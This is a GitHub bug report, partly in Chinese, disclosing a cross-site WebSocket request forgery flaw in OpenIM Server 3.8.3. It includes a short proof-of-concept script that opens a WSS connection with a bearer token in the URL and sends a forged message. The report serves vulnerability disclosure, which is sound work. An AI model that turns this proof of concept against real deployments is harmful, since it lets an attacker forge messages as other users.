[BUG] The WSS protocol has a cross site request forgery vulnerability

### OpenIM Server Version

3.8.3

### Operating System and CPU Architecture

Linux (AMD)

### Deployment Method

Source Code Deployment

### Bug Description and Steps to Reproduce

wss协议存在跨站请求伪造漏洞

1、编写js脚本：
<script>
  const ws = new WebSocket('wss://domain/msg_gateway?compression=gzip&isBackground=false&isMsgResp=true&operationID=1746588237155792797&platformID=5&sendID=20731663401504&token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJVc2VySUQiOiIyMDczMTY2MzQwMTUwNCIsIlBsYXRmb3JtSUQiOjUsImV4cCI6MTc1NDM2NDIzNSwiaWF0IjoxNzQ2NTg4MjMwfQ.Pfuy14Od359sQc6HXdyvX7oYeHGh9miJAKFKP2t7b0I');
  ws.onopen = () => ws.send("试探性消息");
  ws.onmessage = (e) => console.log("收到响应:", e.data);
</script>

发起攻击，发现成功链接，并发送了攻击者伪造信息。

![Image](https://github.com/user-attachments/assets/0398f77f-fe7e-4e79-8e68-ff5a77661165)


### Screenshots Link

_No response_

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

[BUG] The WSS protocol has a cross site request forgery vulnerability #3318

OpenIM Server Version

Operating System and CPU Architecture

Deployment Method

Bug Description and Steps to Reproduce

Screenshots Link

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

[BUG] The WSS protocol has a cross site request forgery vulnerability #3318

Description

OpenIM Server Version

Operating System and CPU Architecture

Deployment Method

Bug Description and Steps to Reproduce

Screenshots Link

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions